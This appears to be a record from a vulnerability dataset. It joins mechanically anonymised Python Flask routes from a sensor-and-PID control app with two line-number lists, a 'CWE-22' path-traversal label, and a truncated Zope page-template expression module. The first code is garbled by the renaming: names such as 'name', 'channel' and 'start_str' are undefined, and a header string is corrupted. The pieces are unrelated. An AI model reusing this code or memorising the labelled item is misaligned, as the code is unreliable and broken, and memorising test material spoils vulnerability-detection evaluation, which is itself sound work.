VAR_79 = VAR_48.name
elif VAR_56:
VAR_79 = VAR_56.name
else:
VAR_79 = None
VAR_57 = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == VAR_13).first()
if VAR_57:
VAR_80 = Conversion.query.filter(
Conversion.unique_id == VAR_57.conversion_id).first()
else:
VAR_80 = None
VAR_22, VAR_21, VAR_29 = return_measurement_info(
VAR_57, VAR_80)
VAR_58 = datetime.datetime.utcnow() - datetime.datetime.now()
VAR_51 = datetime.datetime.fromtimestamp(float(VAR_17))
VAR_51 += VAR_58
VAR_59 = VAR_51.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
VAR_52 = datetime.datetime.fromtimestamp(float(VAR_18))
VAR_52 += VAR_58
VAR_60 = VAR_52.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
VAR_61 = query_string(
VAR_21, VAR_9,
VAR_83=VAR_29, VAR_22=channel,
VAR_59=start_str, VAR_60=end_str)
if VAR_61 == 1:
flash('Invalid query string', 'error')
return redirect(url_for('routes_page.page_export'))
VAR_62 = VAR_47.query(VAR_61).raw
if not VAR_62 or 'series' not in VAR_62 or not VAR_62['series']:
flash('No measurements to export in this time period', 'error')
return redirect(url_for('routes_page.page_export'))
VAR_63 = 'timestamp (UTC)'
VAR_64 = '{VAR_79} {meas} ({id})'.format(
VAR_79=name, meas=VAR_29, id=VAR_9)
VAR_65 = '{id}VAR_37{VAR_79}VAR_37{meas}.csv'.format(
id=VAR_9, VAR_79=name, meas=VAR_29)
import csv
from io import StringIO
def FUNC_26(VAR_66):
VAR_81 = StringIO()
VAR_82 = csv.writer(VAR_81)
VAR_82.writerow([VAR_63, VAR_64])
for csv_line in VAR_66:
VAR_82.writerow([
str(csv_line[0][:-4]).replace('T', ' '),
csv_line[1]
])
VAR_81.seek(0)
yield VAR_81.read()
VAR_81.truncate(0)
VAR_81.seek(0)
VAR_67 = Response(FUNC_26(VAR_62['series'][0]['values']), mimetype='text/csv')
VAR_67.headers['Content-Disposition'] = 'attachment; VAR_3="{}"'.format(VAR_65)
return VAR_67
@VAR_0.route('/async/<VAR_19>/<VAR_20>/<VAR_13>/<VAR_17>/<VAR_18>')
@flask_login.login_required
def FUNC_18(VAR_19, VAR_20, VAR_13, VAR_17, VAR_18):
if VAR_20 == 'tag':
VAR_76 = []
VAR_77 = NoteTags.query.filter(NoteTags.unique_id == VAR_19).first()
VAR_51 = datetime.datetime.utcfromtimestamp(float(VAR_17))
if VAR_18 == '0':
VAR_52 = datetime.datetime.utcnow()
else:
VAR_52 = datetime.datetime.utcfromtimestamp(float(VAR_18))
VAR_78 = Notes.query.filter(
and_(Notes.date_time >= VAR_51, Notes.date_time <= VAR_52)).all()
for each_note in VAR_78:
if VAR_77.unique_id in each_note.tags.split(','):
VAR_76.append(
[each_note.date_time.strftime("%Y-%m-%dT%H:%M:%S.000000000Z"), each_note.name, each_note.note])
if VAR_76:
return jsonify(VAR_76)
else:
return '', 204
VAR_47 = InfluxDBClient(
INFLUXDB_HOST,
INFLUXDB_PORT,
INFLUXDB_USER,
INFLUXDB_PASSWORD,
INFLUXDB_DATABASE)
if VAR_20 in ['input', 'math', 'function', 'output', 'pid']:
VAR_83 = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == VAR_13).first()
else:
VAR_83 = None
if not VAR_83:
return "Could not find measurement"
if VAR_83:
VAR_80 = Conversion.query.filter(
Conversion.unique_id == VAR_83.conversion_id).first()
else:
VAR_80 = None
VAR_22, VAR_21, VAR_29 = return_measurement_info(
VAR_83, VAR_80)
if VAR_17 == '0' and VAR_18 == '0':
VAR_61 = query_string(
VAR_21, VAR_19,
VAR_83=VAR_29,
VAR_22=channel,
VAR_94='COUNT')
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
VAR_84 = VAR_62['series'][0]['values'][0][1]
VAR_61 = query_string(
VAR_21, VAR_19,
VAR_83=VAR_29,
VAR_22=channel,
limit=1)
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
try:
VAR_87 = VAR_62['series'][0]['values'][0][0]
except:
return '', 204
VAR_52 = datetime.datetime.utcnow()
VAR_60 = VAR_52.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
elif VAR_17 != '0' and VAR_18 == '0':
VAR_51 = datetime.datetime.utcfromtimestamp(float(VAR_17))
VAR_59 = VAR_51.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
VAR_52 = datetime.datetime.utcnow()
VAR_60 = VAR_52.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
VAR_61 = query_string(
VAR_21, VAR_19,
VAR_83=VAR_29,
VAR_22=channel,
VAR_94='COUNT',
VAR_59=start_str,
VAR_60=end_str)
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
try:
VAR_84 = VAR_62['series'][0]['values'][0][1]
except:
return '', 204
VAR_61 = query_string(
VAR_21, VAR_19,
VAR_83=VAR_29,
VAR_22=channel,
VAR_59=start_str,
VAR_60=end_str,
limit=1)
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
try:
VAR_87 = VAR_62['series'][0]['values'][0][0]
except:
return '', 204
else:
VAR_51 = datetime.datetime.utcfromtimestamp(float(VAR_17))
VAR_59 = VAR_51.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
VAR_52 = datetime.datetime.utcfromtimestamp(float(VAR_18))
VAR_60 = VAR_52.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
VAR_61 = query_string(
VAR_21, VAR_19,
VAR_83=VAR_29,
VAR_22=channel,
VAR_94='COUNT',
VAR_59=start_str,
VAR_60=end_str)
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
try:
VAR_84 = VAR_62['series'][0]['values'][0][1]
except:
return '', 204
VAR_61 = query_string(
VAR_21, VAR_19,
VAR_83=VAR_29,
VAR_22=channel,
VAR_59=start_str,
VAR_60=end_str,
limit=1)
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
try:
VAR_87 = VAR_62['series'][0]['values'][0][0]
except:
return '', 204
VAR_51 = datetime.datetime.strptime(
influx_time_str_to_milliseconds(VAR_87),
'%Y-%m-%dT%H:%M:%S.%f')
VAR_59 = VAR_51.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
VAR_1.debug('Count = {}'.format(VAR_84))
VAR_1.debug('Start = {}'.format(VAR_51))
VAR_1.debug('End = {}'.format(VAR_52))
VAR_68 = (VAR_52 - VAR_51).total_seconds()
VAR_1.debug('Difference seconds = {}'.format(VAR_68))
if VAR_84 > 700:
VAR_85 = VAR_68 / VAR_84
VAR_1.debug('Seconds per point = {}'.format(VAR_85))
VAR_86 = int(VAR_68 / 700)
VAR_1.debug('Group seconds = {}'.format(VAR_86))
try:
VAR_61 = query_string(
VAR_21, VAR_19,
VAR_83=VAR_29,
VAR_22=channel,
VAR_94='MEAN',
VAR_59=start_str,
VAR_60=end_str,
group_sec=VAR_86)
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
try:
return jsonify(VAR_62['series'][0]['values'])
except:
return '', 204
except Exception as e:
VAR_1.error("URL for 'async_data' raised and error: "
"{err}".format(err=e))
return '', 204
else:
try:
VAR_61 = query_string(
VAR_21, VAR_19,
VAR_83=VAR_29,
VAR_22=channel,
VAR_59=start_str,
VAR_60=end_str)
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
return jsonify(VAR_62['series'][0]['values'])
except Exception as e:
VAR_1.error("URL for 'async_data' raised and error: "
"{err}".format(err=e))
return '', 204
@VAR_0.route('/async_usage/<VAR_19>/<VAR_21>/<VAR_22>/<VAR_17>/<VAR_18>')
@flask_login.login_required
def FUNC_19(VAR_19, VAR_21, VAR_22, VAR_17, VAR_18):
VAR_47 = InfluxDBClient(
INFLUXDB_HOST,
INFLUXDB_PORT,
INFLUXDB_USER,
INFLUXDB_PASSWORD,
INFLUXDB_DATABASE)
if VAR_17 == '0' and VAR_18 == '0':
VAR_61 = query_string(
VAR_21, VAR_19,
VAR_22=channel,
VAR_94='COUNT')
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
VAR_84 = VAR_62['series'][0]['values'][0][1]
VAR_61 = query_string(
VAR_21, VAR_19,
VAR_22=channel,
limit=1)
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
VAR_87 = VAR_62['series'][0]['values'][0][0]
VAR_52 = datetime.datetime.utcnow()
VAR_60 = VAR_52.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
elif VAR_17 != '0' and VAR_18 == '0':
VAR_51 = datetime.datetime.utcfromtimestamp(float(VAR_17))
VAR_59 = VAR_51.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
VAR_52 = datetime.datetime.utcnow()
VAR_60 = VAR_52.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
VAR_61 = query_string(
VAR_21, VAR_19,
VAR_22=channel,
VAR_94='COUNT',
VAR_59=start_str,
VAR_60=end_str)
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
VAR_84 = VAR_62['series'][0]['values'][0][1]
VAR_61 = query_string(
VAR_21, VAR_19,
VAR_22=channel,
VAR_59=start_str,
VAR_60=end_str,
limit=1)
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
VAR_87 = VAR_62['series'][0]['values'][0][0]
else:
VAR_51 = datetime.datetime.utcfromtimestamp(float(VAR_17))
VAR_59 = VAR_51.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
VAR_52 = datetime.datetime.utcfromtimestamp(float(VAR_18))
VAR_60 = VAR_52.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
VAR_61 = query_string(
VAR_21, VAR_19,
VAR_22=channel,
VAR_94='COUNT',
VAR_59=start_str,
VAR_60=end_str)
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
VAR_84 = VAR_62['series'][0]['values'][0][1]
VAR_61 = query_string(
VAR_21, VAR_19,
VAR_22=channel,
VAR_59=start_str,
VAR_60=end_str,
limit=1)
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
VAR_87 = VAR_62['series'][0]['values'][0][0]
VAR_51 = datetime.datetime.strptime(
influx_time_str_to_milliseconds(VAR_87),
'%Y-%m-%dT%H:%M:%S.%f')
VAR_59 = VAR_51.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
VAR_1.debug('Count = {}'.format(VAR_84))
VAR_1.debug('Start = {}'.format(VAR_51))
VAR_1.debug('End = {}'.format(VAR_52))
VAR_68 = (VAR_52 - VAR_51).total_seconds()
VAR_1.debug('Difference seconds = {}'.format(VAR_68))
if VAR_84 > 700:
VAR_85 = VAR_68 / VAR_84
VAR_1.debug('Seconds per point = {}'.format(VAR_85))
VAR_86 = int(VAR_68 / 700)
VAR_1.debug('Group seconds = {}'.format(VAR_86))
try:
VAR_61 = query_string(
VAR_21, VAR_19,
VAR_22=channel,
VAR_94='MEAN',
VAR_59=start_str,
VAR_60=end_str,
group_sec=VAR_86)
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
return jsonify(VAR_62['series'][0]['values'])
except Exception as e:
VAR_1.error("URL for 'async_data' raised and error: "
"{err}".format(err=e))
return '', 204
else:
try:
VAR_61 = query_string(
VAR_21, VAR_19,
VAR_22=channel,
VAR_59=start_str,
VAR_60=end_str)
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
return jsonify(VAR_62['series'][0]['values'])
except Exception as e:
VAR_1.error("URL for 'async_usage' raised and error: "
"{err}".format(err=e))
return '', 204
@VAR_0.route('/FUNC_20/<VAR_23>/<VAR_22>/<VAR_24>/<VAR_25>/<VAR_26>')
@flask_login.login_required
def FUNC_20(VAR_23, VAR_22, VAR_24, VAR_25, VAR_26):
if not utils_general.user_has_permission('edit_controllers'):
return 'Insufficient user permissions to manipulate outputs'
if is_int(VAR_22):
VAR_88 = int(VAR_22)
else:
VAR_89 = db_retrieve_table(OutputChannel).filter(
OutputChannel.unique_id == VAR_22).first()
if VAR_89:
VAR_88 = VAR_89.channel
else:
return "Could not determine VAR_22 VAR_92 from VAR_22 ID '{}'".format(VAR_22)
VAR_69 = DaemonControl()
if (VAR_24 in ['on', 'off'] and str_is_float(VAR_26) and
(
(VAR_25 in ['sec', 'pwm'] and float(VAR_26) >= 0) or
VAR_25 == 'vol' or
VAR_25 == 'value'
)):
VAR_90 = VAR_69.output_on_off(
VAR_23,
VAR_24,
VAR_25=output_type,
VAR_26=float(VAR_26),
VAR_88=output_channel)
if VAR_90[0]:
return 'ERROR: {}'.format(VAR_90[1])
else:
return 'SUCCESS: {}'.format(VAR_90[1])
else:
return 'ERROR: unknown parameters: ' \
'output_id: {}, VAR_22: {}, VAR_24: {}, VAR_25: {}, VAR_26: {}'.format(
VAR_23, VAR_22, VAR_24, VAR_25, VAR_26)
@VAR_0.route('/daemonactive')
@flask_login.login_required
def FUNC_21():
try:
VAR_91 = DaemonControl()
return VAR_91.daemon_status()
except Exception as e:
VAR_1.error("URL for 'daemon_active' raised and error: "
"{err}".format(err=e))
return '0'
@VAR_0.route('/systemctl/<VAR_27>')
@flask_login.login_required
def FUNC_22(VAR_27):
if not utils_general.user_has_permission('edit_settings'):
return redirect(url_for('routes_general.home'))
try:
if VAR_27 not in ['restart', 'shutdown', 'daemon_restart', 'frontend_reload']:
flash("Unrecognized command: {VAR_27}".format(
VAR_27=action), "success")
return redirect('/settings')
if DOCKER_CONTAINER:
if VAR_27 == 'daemon_restart':
VAR_91 = DaemonControl()
VAR_91.terminate_daemon()
flash(gettext("Command to restart the VAR_69 sent"), "success")
elif VAR_27 == 'frontend_reload':
subprocess.Popen('docker restart mycodo_flask 2>&1', shell=True)
flash(gettext("Command to reload the frontend sent"), "success")
else:
VAR_108 = '{VAR_34}/mycodo/scripts/mycodo_wrapper {VAR_27} 2>&1'.format(
VAR_34=INSTALL_DIRECTORY, VAR_27=action)
subprocess.Popen(VAR_108, shell=True)
if VAR_27 == 'restart':
flash(gettext("System rebooting in 10 seconds"), "success")
elif VAR_27 == 'shutdown':
flash(gettext("System shutting down in 10 seconds"), "success")
elif VAR_27 == 'daemon_restart':
flash(gettext("Command to restart the VAR_69 sent"), "success")
elif VAR_27 == 'frontend_reload':
flash(gettext("Command to reload the frontend sent"), "success")
return redirect('/settings')
except Exception as e:
VAR_1.error("System command '{VAR_108}' raised and error: "
"{err}".format(VAR_108=VAR_27, err=e))
flash("System command '{VAR_108}' raised and error: "
"{err}".format(VAR_108=VAR_27, err=e), "error")
return redirect(url_for('routes_general.home'))
def FUNC_23(VAR_28, VAR_21, VAR_14, VAR_29=None, VAR_22=None):
VAR_47 = InfluxDBClient(
INFLUXDB_HOST,
INFLUXDB_PORT,
INFLUXDB_USER,
INFLUXDB_PASSWORD,
INFLUXDB_DATABASE)
VAR_61 = query_string(
VAR_21,
VAR_28,
VAR_83=VAR_29,
VAR_22=channel,
VAR_94='LAST',
past_sec=VAR_14)
if VAR_61 == 1:
return [None, None]
try:
VAR_62 = VAR_47.query(VAR_61).raw
VAR_92 = len(VAR_62['series'][0]['values'])
VAR_93 = VAR_62['series'][0]['values'][VAR_92 - 1][0]
VAR_94 = VAR_62['series'][0]['values'][VAR_92 - 1][1]
VAR_94 = '{:.3f}'.format(float(VAR_94))
VAR_95 = date_parse(VAR_93)
VAR_16 = calendar.timegm(VAR_95.timetuple()) * 1000
return [VAR_16, VAR_94]
except KeyError:
return [None, None]
except Exception:
return [None, None]
@VAR_0.route('/last_pid/<VAR_30>/<VAR_31>')
@flask_login.login_required
def FUNC_24(VAR_30, VAR_31):
if not str_is_float(VAR_31):
return '', 204
try:
VAR_70 = PID.query.filter(PID.unique_id == VAR_30).first()
if len(VAR_70.measurement.split(',')) == 2:
VAR_19 = VAR_70.measurement.split(',')[0]
VAR_13 = VAR_70.measurement.split(',')[1]
else:
VAR_19 = None
VAR_13 = None
VAR_96 = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == VAR_13).first()
if VAR_96:
VAR_109 = Conversion.query.filter(
Conversion.unique_id == VAR_96.conversion_id).first()
else:
VAR_109 = None
(VAR_97,
VAR_98,
VAR_96) = return_measurement_info(
VAR_96, VAR_109)
VAR_99 = None
if VAR_70 and ',' in VAR_70.measurement:
VAR_110 = VAR_70.measurement.split(',')[1]
VAR_111 = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == VAR_110).first()
if VAR_111:
VAR_80 = Conversion.query.filter(
Conversion.unique_id == VAR_111.conversion_id).first()
VAR_37, VAR_99, VAR_37 = return_measurement_info(VAR_111, VAR_80)
VAR_100 = FUNC_23(
VAR_30, 'pid_value', VAR_31, VAR_29='pid_p_value')
VAR_101 = FUNC_23(
VAR_30, 'pid_value', VAR_31, VAR_29='pid_i_value')
VAR_102 = FUNC_23(
VAR_30, 'pid_value', VAR_31, VAR_29='pid_d_value')
if None not in (VAR_100[1], VAR_101[1], VAR_102[1]):
VAR_112 = [VAR_100[0], '{:.3f}'.format(float(VAR_100[1]) + float(VAR_101[1]) + float(VAR_102[1]))]
else:
VAR_112 = None
VAR_103 = None
if VAR_70.band:
try:
VAR_69 = DaemonControl()
VAR_103 = VAR_69.pid_get(VAR_70.unique_id, 'setpoint_band')
except:
VAR_1.debug("Couldn't get setpoint")
VAR_104 = {
'activated': VAR_70.is_activated,
'paused': VAR_70.is_paused,
'held': VAR_70.is_held,
'setpoint': FUNC_23(
VAR_30, VAR_99, VAR_31, VAR_22=0),
'setpoint_band': VAR_103,
'pid_p_value': VAR_100,
'pid_i_value': VAR_101,
'pid_d_value': VAR_102,
'pid_pid_value': VAR_112,
'duration_time': FUNC_23(
VAR_30, 's', VAR_31, VAR_29='duration_time'),
'duty_cycle': FUNC_23(
VAR_30, 'percent', VAR_31, VAR_29='duty_cycle'),
'actual': FUNC_23(
VAR_19,
VAR_98,
VAR_31,
VAR_29=VAR_96,
VAR_22=VAR_97)
}
return jsonify(VAR_104)
except KeyError:
VAR_1.debug("No Data returned form influxdb")
return '', 204
except Exception as e:
VAR_1.exception("URL for 'last_pid' raised and error: "
"{err}".format(err=e))
return '', 204
@VAR_0.route('/FUNC_25/<VAR_9>/<VAR_24>')
@flask_login.login_required
def FUNC_25(VAR_9, VAR_24):
if not utils_general.user_has_permission('edit_controllers'):
return 'Insufficient user permissions to manipulate PID'
VAR_70 = PID.query.filter(PID.unique_id == VAR_9).first()
VAR_69 = DaemonControl()
if VAR_24 == 'activate_pid':
VAR_70.is_activated = True
VAR_70.save()
VAR_37, VAR_105 = VAR_69.controller_activate(VAR_70.unique_id)
return VAR_105
elif VAR_24 == 'deactivate_pid':
VAR_70.is_activated = False
VAR_70.is_paused = False
VAR_70.is_held = False
VAR_70.save()
VAR_37, VAR_105 = VAR_69.controller_deactivate(VAR_70.unique_id)
return VAR_105
elif VAR_24 == 'pause_pid':
VAR_70.is_paused = True
VAR_70.save()
if VAR_70.is_activated:
VAR_105 = VAR_69.pid_pause(VAR_70.unique_id)
else:
VAR_105 = "PID Paused (Note: PID is not currently active)"
return VAR_105
elif VAR_24 == 'hold_pid':
VAR_70.is_held = True
VAR_70.save()
if VAR_70.is_activated:
VAR_105 = VAR_69.pid_hold(VAR_70.unique_id)
else:
VAR_105 = "PID Held (Note: PID is not currently active)"
return VAR_105
elif VAR_24 == 'resume_pid':
VAR_70.is_held = False
VAR_70.is_paused = False
VAR_70.save()
if VAR_70.is_activated:
VAR_105 = VAR_69.pid_resume(VAR_70.unique_id)
else:
VAR_105 = "PID Resumed (Note: PID is not currently active)"
return VAR_105
elif 'set_setpoint_pid' in VAR_24:
VAR_70.setpoint = VAR_24.split('|')[1]
VAR_70.save()
if VAR_70.is_activated:
VAR_105 = VAR_69.pid_set(VAR_70.unique_id, 'setpoint', float(VAR_24.split('|')[1]))
else:
VAR_105 = "PID Setpoint changed (Note: PID is not currently active)"
return VAR_105
| [
1,
8,
24,
59,
64,
66,
68,
69,
85,
106,
111,
112,
123,
124,
144,
153,
155,
156,
177,
178,
185,
187,
189,
200,
201,
208,
209,
219,
220,
226,
227,
236,
237,
245,
246,
252,
253,
260,
262,
263,
270,
278,
284,
290,
293,
317,
319,
324,
328,
340,
341,
348,
351,
355,
360,
365,
373,
379,
382,
388,
391,
402,
409,
412,
414,
423,
424,
438,
445,
449,
452,
455,
472,
473,
474,
480,
481,
495,
499,
508,
518,
526,
535,
539,
540,
548,
563,
567,
568,
579,
585,
592,
597,
604,
610,
613,
621,
622,
624,
630,
634,
636,
642,
646,
651,
654,
660,
668,
672,
677,
678,
686,
690,
700,
708,
712,
717,
718,
726,
730,
735,
740,
744,
745,
748,
749,
750,
752,
755,
756,
759,
769,
773,
790,
794,
800,
801,
815,
816,
818,
823,
827,
829,
834,
838,
842,
848,
855,
859,
861,
862,
869,
873,
880,
887,
891,
893,
894,
901,
905,
907,
912,
916,
917,
920,
921,
922,
924,
927,
928,
931,
940,
944,
957,
961,
967,
968,
975,
977,
980,
987,
1009,
1010,
1022,
1023,
1030,
1036,
1049,
1058,
1060,
1067,
1068,
1069,
1070,
1071,
1072,
1080,
1090,
1097,
1105,
1106,
1113,
1116,
1123,
1131,
1136,
1146,
1157,
1165,
1196,
1197,
1204,
1206,
1253,
1254,
1255,
1256,
1257,
1258,
1259,
1260,
1261,
1262,
1263,
1264,
1265,
1266,
1267,
1268,
72,
88,
116,
128,
160,
182,
203,
213,
224,
231,
241,
250,
257,
267,
345,
428,
485,
486,
487,
488,
572,
573,
574,
575,
805,
806,
807,
808,
972,
1014,
1027,
1110,
1201,
550
] | [
1,
8,
24,
59,
64,
66,
68,
69,
85,
106,
111,
112,
124,
125,
145,
155,
157,
158,
179,
180,
187,
189,
191,
202,
203,
210,
211,
221,
222,
228,
229,
238,
239,
247,
248,
254,
255,
262,
264,
265,
272,
280,
286,
292,
295,
319,
321,
326,
330,
342,
343,
350,
353,
357,
362,
367,
375,
381,
384,
390,
393,
404,
411,
414,
416,
425,
426,
440,
447,
451,
454,
457,
474,
475,
476,
482,
483,
497,
501,
510,
520,
528,
537,
541,
542,
550,
565,
569,
570,
581,
587,
594,
599,
606,
612,
615,
623,
624,
626,
632,
636,
638,
644,
648,
653,
656,
662,
670,
674,
679,
680,
688,
692,
702,
710,
714,
719,
720,
728,
732,
737,
742,
746,
747,
750,
751,
752,
754,
757,
758,
761,
771,
775,
792,
796,
802,
803,
817,
818,
820,
825,
829,
831,
836,
840,
844,
850,
857,
861,
863,
864,
871,
875,
882,
889,
893,
895,
896,
903,
907,
909,
914,
918,
919,
922,
923,
924,
926,
929,
930,
933,
942,
946,
959,
963,
969,
970,
977,
979,
982,
989,
1011,
1012,
1024,
1025,
1032,
1038,
1051,
1060,
1062,
1069,
1070,
1071,
1072,
1073,
1074,
1082,
1092,
1099,
1107,
1108,
1115,
1118,
1125,
1133,
1138,
1148,
1159,
1167,
1198,
1199,
1206,
1208,
1255,
1256,
1257,
1258,
1259,
1260,
1261,
1262,
1263,
1264,
1265,
1266,
1267,
1268,
1269,
1270,
72,
88,
116,
129,
162,
184,
205,
215,
226,
233,
243,
252,
259,
269,
347,
430,
487,
488,
489,
490,
574,
575,
576,
577,
807,
808,
809,
810,
974,
1016,
1029,
1112,
1203,
552
] |
0CWE-22
| ##############################################################################
#
# Copyright (c) 2002 Zope Foundation and Contributors.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE
#
##############################################################################
"""Page Template Expression Engine
Page Template-specific implementation of TALES, with handlers
for Python expressions, string literals, and paths.
"""
import logging
import warnings
import OFS.interfaces
from AccessControl import safe_builtins
from Acquisition import aq_base
from MultiMapping import MultiMapping
from zExceptions import NotFound
from zExceptions import Unauthorized
from zope.component import queryUtility
from zope.contentprovider.tales import TALESProviderExpression
from zope.i18n import translate
from zope.interface import implementer
from zope.pagetemplate.engine import ZopeEngine as Z3Engine
from zope.proxy import removeAllProxies
from zope.tales.expressions import DeferExpr
from zope.tales.expressions import LazyExpr
from zope.tales.expressions import NotExpr
from zope.tales.expressions import PathExpr
from zope.tales.expressions import StringExpr
from zope.tales.expressions import SubPathExpr
from zope.tales.expressions import Undefs
from zope.tales.pythonexpr import PythonExpr
from zope.tales.tales import Context
from zope.tales.tales import ErrorInfo as BaseErrorInfo
from zope.tales.tales import Iterator
from zope.traversing.adapters import traversePathElement
from zope.traversing.interfaces import ITraversable
from . import ZRPythonExpr
from .interfaces import IUnicodeEncodingConflictResolver
from .interfaces import IZopeAwareEngine
SecureModuleImporter = ZRPythonExpr._SecureModuleImporter()
LOG = logging.getLogger('Expressions')
# In Zope 2 traversal semantics, NotFound or Unauthorized (the Zope 2
# versions) indicate that traversal has failed. By default, zope.tales'
# engine doesn't recognize them as such which is why we extend its
# list here and make sure our implementation of the TALES
# Path Expression uses them
ZopeUndefs = Undefs + (NotFound, Unauthorized)
def boboAwareZopeTraverse(object, path_items, econtext):
"""Traverses a sequence of names, first trying attributes then items.
This uses zope.traversing path traversal where possible and interacts
correctly with objects providing OFS.interface.ITraversable when
necessary (bobo-awareness).
"""
request = getattr(econtext, 'request', None)
path_items = list(path_items)
path_items.reverse()
while path_items:
name = path_items.pop()
if name == '_':
warnings.warn('Traversing to the name `_` is deprecated '
'and will be removed in Zope 6.',
DeprecationWarning)
elif name.startswith('_'):
raise NotFound(name)
if OFS.interfaces.ITraversable.providedBy(object):
object = object.restrictedTraverse(name)
else:
object = traversePathElement(object, name, path_items,
request=request)
return object
def trustedBoboAwareZopeTraverse(object, path_items, econtext):
"""Traverses a sequence of names, first trying attributes then items.
This uses zope.traversing path traversal where possible and interacts
correctly with objects providing OFS.interface.ITraversable when
necessary (bobo-awareness).
"""
request = getattr(econtext, 'request', None)
path_items = list(path_items)
path_items.reverse()
while path_items:
name = path_items.pop()
if OFS.interfaces.ITraversable.providedBy(object):
object = object.unrestrictedTraverse(name)
else:
object = traversePathElement(object, name, path_items,
request=request)
return object
def render(ob, ns):
"""Calls the object, possibly a document template, or just returns
it if not callable. (From DT_Util.py)
"""
if hasattr(ob, '__render_with_namespace__'):
ob = ZRPythonExpr.call_with_ns(ob.__render_with_namespace__, ns)
else:
# items might be acquisition wrapped
base = aq_base(ob)
# item might be proxied (e.g. modules might have a deprecation
# proxy)
base = removeAllProxies(base)
if callable(base):
try:
if getattr(base, 'isDocTemp', 0):
ob = ZRPythonExpr.call_with_ns(ob, ns, 2)
else:
ob = ob()
except NotImplementedError:
pass
return ob
class _CombinedMapping:
"""Minimal auxiliary class to combine several mappings.
Earlier mappings take precedence.
"""
def __init__(self, *ms):
self.mappings = ms
def get(self, key, default):
for m in self.mappings:
value = m.get(key, self)
if value is not self:
return value
return default
class UntrustedSubPathExpr(SubPathExpr):
ALLOWED_BUILTINS = safe_builtins
class TrustedSubPathExpr(SubPathExpr):
# we allow both Python's builtins (we are trusted)
# as well as ``safe_builtins`` (because it may contain extensions)
# Python's builtins take precedence, because those of
# ``safe_builtins`` may have special restrictions for
# the use in an untrusted context
ALLOWED_BUILTINS = _CombinedMapping(
__builtins__,
safe_builtins)
class ZopePathExpr(PathExpr):
_TRAVERSER = staticmethod(boboAwareZopeTraverse)
SUBEXPR_FACTORY = UntrustedSubPathExpr
def __init__(self, name, expr, engine):
if not expr.strip():
expr = 'nothing'
super().__init__(name, expr, engine, self._TRAVERSER)
# override this to support different call metrics (see bottom of
# method) and Zope 2's traversal exceptions (ZopeUndefs instead of
# Undefs)
def _eval(self, econtext):
for expr in self._subexprs[:-1]:
# Try all but the last subexpression, skipping undefined ones.
try:
ob = expr(econtext)
except ZopeUndefs: # use Zope 2 expression types
pass
else:
break
else:
# On the last subexpression allow exceptions through.
ob = self._subexprs[-1](econtext)
if self._hybrid:
return ob
if self._name == 'nocall':
return ob
# this is where we are different from our super class:
return render(ob, econtext.vars)
# override this to support Zope 2's traversal exceptions
# (ZopeUndefs instead of Undefs)
def _exists(self, econtext):
for expr in self._subexprs:
try:
expr(econtext)
except ZopeUndefs: # use Zope 2 expression types
pass
else:
return 1
return 0
class TrustedZopePathExpr(ZopePathExpr):
_TRAVERSER = staticmethod(trustedBoboAwareZopeTraverse)
SUBEXPR_FACTORY = TrustedSubPathExpr
class SafeMapping(MultiMapping):
"""Mapping with security declarations and limited method exposure.
Since it subclasses MultiMapping, this class can be used to wrap
one or more mapping objects. Restricted Python code will not be
able to mutate the SafeMapping or the wrapped mappings, but will be
able to read any value.
"""
__allow_access_to_unprotected_subobjects__ = True
push = pop = None
_push = MultiMapping.push
_pop = MultiMapping.pop
class ZopeContext(Context):
def __init__(self, engine, contexts):
super().__init__(engine, contexts)
# wrap the top-level 'repeat' variable, as it is visible to
# restricted code
self.setContext('repeat', SafeMapping(self.repeat_vars))
# regenerate the first scope and the scope stack after messing
# with the global context
self.vars = vars = contexts.copy()
self._vars_stack = [vars]
def translate(self, msgid, domain=None, mapping=None, default=None):
context = self.contexts.get('request')
return translate(
msgid, domain=domain, mapping=mapping,
context=context, default=default)
def evaluateBoolean(self, expr):
value = self.evaluate(expr)
# here we override the normal zope.tales behaviour. zope.tales
# doesn't care about the default in a boolean expression,
# while we do (Zope 2 legacy, see the
